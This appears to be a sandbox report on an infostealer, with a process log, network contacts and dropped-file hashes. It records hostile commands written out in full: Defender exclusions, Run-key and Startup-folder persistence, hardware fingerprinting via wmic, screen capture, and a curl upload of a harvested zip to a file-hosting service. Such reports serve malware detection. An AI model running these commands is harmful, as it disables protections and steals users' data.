C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e1cfwjes\e1cfwjes.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6793.tmp" "c:\Users\Admin\AppData\Local\Temp\e1cfwjes\CSCE0AC1E63EC204064BD6E32427BA0E4C3.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\stub.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

Network

Country Destination Domain Proto
US 8.8.8.8:53 85.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
BE 2.17.196.145:443 www.bing.com tcp
US 8.8.8.8:53 145.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 104.26.13.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 api.filedoge.com udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 134.193.13.49.in-addr.arpa udp
US 8.8.8.8:53 29.17.21.2.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 www.myexternalip.com udp
US 34.117.118.44:443 www.myexternalip.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 mrbfederali.cam udp
US 172.67.205.179:443 mrbfederali.cam tcp
US 172.67.205.179:80 mrbfederali.cam tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 179.205.67.172.in-addr.arpa udp
US 162.159.135.233:443 discordapp.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/4000-72-0x00007FF8F4E23000-0x00007FF8F4E25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygd3xk2a.lah.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4000-78-0x0000022343CE0000-0x0000022343D02000-memory.dmp

memory/4000-83-0x00007FF8F4E20000-0x00007FF8F58E1000-memory.dmp

memory/4000-84-0x00007FF8F4E20000-0x00007FF8F58E1000-memory.dmp

memory/4000-85-0x0000022343E60000-0x0000022343EA4000-memory.dmp

memory/4000-86-0x00000223442C0000-0x0000022344336000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\0epdxd2t\0epdxd2t.cmdline

MD5 b27a2059be86f9877fc3e75013982bd3
SHA1 2a58672bb3060cbc2fbf35bc73466b1564cb3f0c
SHA256 6b45cc1db0d920e0e1a6f91ead6d5f5820d7b20dbef5b41eb467ec7f27af8aa8
SHA512 cb3a129ba303cba02b95dc954bcd9e42110344131aba745e30ac7da3816ef4b14ce39b25300c60651c2e996bd8b06966df158b340c90413f96a1e1273fbed720

\??\c:\Users\Admin\AppData\Local\Temp\0epdxd2t\0epdxd2t.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\0epdxd2t\CSC9968AE51B6C142EE8A7E58CE6AEABCEB.TMP

MD5 66acf124aeb85e94462842cf5fdf6bb1
SHA1 f5b1cdbcd3a05158a5113ec2bb1f0b2531edcad8
SHA256 3c3f5383a868d2bcf654ecd5d2c2cca19bec1d9b5e1c7500388a99a37a9b97ef
SHA512 598f1cfb0dfedb84dac5b80dabf4937a471eee8d3ca0d42f06722195b3bf45921802daecddb88e488f08744dd1e10dfcaefa18d152bef0b6776814fbc2ad6892

C:\Users\Admin\AppData\Local\Temp\RES5EAA.tmp

MD5 f6fd41c20fe02df6c656d3557bae22ed
SHA1 f8ad2ede9c28af78b8e1b1d9a0069043c23acbbd
SHA256 59814ffce9c49c083a1251b31c7e7e34b19beec77ecd98627abef6e6760aa317
SHA512 64bb14dfbda15a5211c5a502103ef647092377278ec674c4adfea07ecd7ed9d66559cca7eb56ca9a811aae02ffaf1d6ad8d177afdb1123091fcc273669ab242d

memory/4000-99-0x0000022343E40000-0x0000022343E48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0epdxd2t\0epdxd2t.dll

MD5 dce2d886bd84d2312a3f40b23ec48366
SHA1 e19179aaf28d7635cb07f99c8b69db495a5b2fbf
SHA256 c3c90f2e536cc4efa2a14845e30d753597a9efc018e3a46492fe2fd027cc40ee
SHA512 0aa097fa28cb0df28466ea6dc55df4a18e9d3f79c834cc0f7977fbe6e9d7dd94db32478ac752d3d7a30a1c21cf78a7a59ddb60e35923c8618ed19d423b75a4d8

memory/4000-103-0x00007FF8F4E20000-0x00007FF8F58E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/1760-115-0x000002C65B940000-0x000002C65B990000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e86a2f4d6dec82df96431112380a87e6
SHA1 2dc61fae82770528bee4fe5733a8ac3396012e79
SHA256 dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a
SHA512 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fcfa95543a7088c79ff4dd7ce6cd352
SHA1 5fc2045faf1c35ebf32907a4b8cf76874fd31f43
SHA256 e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e
SHA512 b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 e4f5fdd7337110185b947e52670ce84d
SHA1 bcba3cfbc5bec4343a69967ed80e544c0407f100
SHA256 6bbbe434a86a4362ddd74788722840582bb7bdf99eaab5db8f476625d75cd772
SHA512 336f5897f66a72881964b0d596e919066ba842a2c131f07ce0051bd466eaf68c7539e1ea37417883d067a35156bbbff60df037ffe1ba86a97ebfdf7084bdad5a

\??\c:\Users\Admin\AppData\Local\Temp\e1cfwjes\e1cfwjes.cmdline

MD5 01b1ea867ad8892c9072f50451ec1e45
SHA1 b6f4239be5d95d6aba740bce1724c3e6aba832f1
SHA256 726e8ce0a013566a957336141d58273921069025361d025a583a8f1812c8b7d0
SHA512 4e3cb4e21e30245acc548ce1d08ae681f4974869ea3790a4ce163d3b6b78301ffd2f37069d1362711532220666bb198c511fc0cac449b697aa888ff138ead65f

\??\c:\Users\Admin\AppData\Local\Temp\e1cfwjes\e1cfwjes.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\e1cfwjes\CSCE0AC1E63EC204064BD6E32427BA0E4C3.TMP

MD5 32fba832468112394e6db6dca91b3a0a
SHA1 fb43f33a33838c2f3cbc62c0f387884fde57e415
SHA256 89a84dda9e9738adb8a60c8e4f185fe7ef492540e9291995bfa470e25664d0ea
SHA512 ca799889fc48721e246a598d47f05555baef2a2d17ba73470b44d74e1c66b8d706ea9d8f434c2459ce2a7cc21b6d1d6996ac53f0dcf9504d6d1e7ec5d17c6f31

C:\Users\Admin\AppData\Local\Temp\RES6793.tmp

MD5 01063d09f8dc614d6b029d3fccdd1658
SHA1 f3492faec61cdf0e6f749fd1799298b9436f469a
SHA256 f2ae7f6e6b894306dcceeffce7f795a301585730c59f264c48b624dd2f56d803
SHA512 e0ab678dddf37e460cc43be99ad694fd334c88033f55ef835ede902dddcb66b5ae63325d235bf3b32823bf146f768049cc1ff22d2393bd707c79017002c6c595

memory/944-190-0x000001BCFA590000-0x000001BCFA598000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e1cfwjes\e1cfwjes.dll

MD5 cd1053a5231b30f49e9d260c37436107
SHA1 7381bc13ccd49abbd380369cefa8a89e3eeedbc4
SHA256 e455020fb228a1f7a6111681ed8e7fb0b1de5c92b72c8e5d5362772108bcad10
SHA512 2bac8a8ec7d9a766277508c79771c089b7f566e738fe4519899322c50e99c54b2ae71e827a8eb5bce5acd23b8efc8df5354f47732a1ebb5b742be4b4a7d46942

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7f5040b7d0495ad05b6c255020a43af3
SHA1 a48b8e3867370762af1da836a6ac61f6199601de
SHA256 45ea002d0fb07a41b200a7c5df2b35b0b57beedadbcedfd372112d99f0a04c0d
SHA512 1168867cfb7ba4287707ebb9087cebc83871934bc852556e83223b67d19d896239e4a2d8ee7016ed597c28cd9bd68f01cbfec183cfc5ed4873583c8354fc97c5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1400b7208465e875d44190b9b465fcfb
SHA1 ffd77f7fe78207e5a862b4f536d902019a155e26
SHA256 4fc3a908a25bf9861afb2ec7b3f854fadd986ac281b134cb4e89e46ba6aed0c5
SHA512 57596642a72347985ae9dda5a9e8d01a5c6cbeb5fac227d69fa1fbf38ae867ea4f434f9aec8b990ca397295886ce503abad49efed2f6ea7fdd6bf5d803bf1f38

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d75098c0d683ab68bcad88feffc8407
SHA1 8ed6555a018df6970328138891555c55acc02f51
SHA256 dee25e8f5a0d340384eb982c3bfdf950d3ac5d1d56de89678a2acf456f7ac513
SHA512 448f050c76d7dbe77eda77b7ff9ce4bafc93215c648ec83c904af98fa5005e82fe10651a352d4cf074674ae6de3b2426d888b75cbf833768d3c379e5ad725391

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\ProgramData\Steam\Launcher\EN-Bvrkipts\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
